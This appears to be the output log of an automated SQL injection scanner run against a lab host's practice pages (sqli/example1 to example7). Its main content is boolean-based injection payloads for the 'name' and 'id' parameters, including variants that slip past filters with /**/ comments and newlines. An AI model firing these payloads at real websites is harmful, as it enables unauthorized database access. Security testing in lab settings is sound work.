Target: http://192.168.42.133 (GET)

---
URL:http://192.168.42.133/sqli/example1.php (GET)
VulnName: 
Query: {'name': 'root'}
Payload: '	and	'68520'='68520
'	and	'36222'='36222
'	or	27846=27846#
'	and	'86690'='86691
Advice: 
---
---
URL:http://192.168.42.133/sqli/example2.php (GET)
VulnName: 
Query: {'name': 'root'}
Payload: '	and	'68520'='68520
'	and	'36222'='36222
'	or	27846=27846#
'	and	'86690'='86691
Advice: 
---
---
URL:http://192.168.42.133/sqli/example4.php (GET)
VulnName: 
Query: {'id': '2'}
Payload: 	and	25519=25519
	and	38873=38873
	or	37601=37601#
	and	39139=39140
Advice: 
---
---
URL:http://192.168.42.133/sqli/example5.php (GET)
VulnName: 
Query: {'id': '2'}
Payload: 	and	25519=25519
	and	38873=38873
	or	37601=37601#
	and	39139=39140
Advice: 
---
---
URL:http://192.168.42.133/sqli/example6.php (GET)
VulnName: 
Query: {'id': '2'}
Payload: 	and	25519=25519
	and	38873=38873
	or	37601=37601#
	and	39139=39140
Advice: 
---
---
URL:http://192.168.42.133/sqli/example3.php (GET)
VulnName: 
Query: {'name': 'root'}
Payload: '/**/and/**/'6838'='6838
'/**/and/**/'52472'='52472
'/**/or/**/42293=42293#
'/**/and/**/'89090'='89091
Advice: 
---
---
URL:http://192.168.42.133/sqli/example7.php (GET)
VulnName: 
Query: {'id': '2'}
Payload: 
and
36054=36054

and
21078=21078

or
49984=49984#

and
90456=90457
Advice: 
---